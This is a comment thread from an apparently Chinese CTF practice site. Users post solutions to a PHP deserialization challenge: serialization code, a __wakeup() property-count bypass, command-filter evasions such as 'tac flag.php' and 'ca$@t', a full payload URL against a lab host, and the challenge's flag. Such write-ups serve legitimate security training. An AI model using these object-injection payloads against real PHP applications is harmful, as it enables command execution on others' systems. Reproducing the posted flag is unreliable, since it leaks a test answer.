评分(3)
解题动态

smtall 攻破了该题 1天前

LostDawn 攻破了该题 1天前

yy56 攻破了该题 2天前

ZZZZZZYx 攻破了该题 4天前

The-Beacon 攻破了该题 4天前

liuweiak007 攻破了该题 5天前

小坑西1 攻破了该题 5天前

Lidisheng2027 攻破了该题 7天前

NNuuNN 攻破了该题 7天前

2424291112 攻破了该题 7天前

Subuloy 攻破了该题 8天前

yiwuxiaobawang 攻破了该题 8天前

soulchild 攻破了该题 10天前


yangbing8555 攻破了该题 10天前

Cyberrui 攻破了该题 12天前

13567024312 攻破了该题 12天前

卡卡罗特M 攻破了该题 14天前

admin1322 攻破了该题 14天前

JJJleo 攻破了该题 14天前

评论
不会编程的崽 1年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 1年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 2年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 2年前
举报
特别要注意下url编码的问题
泡椒控卫 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 2年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 2年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~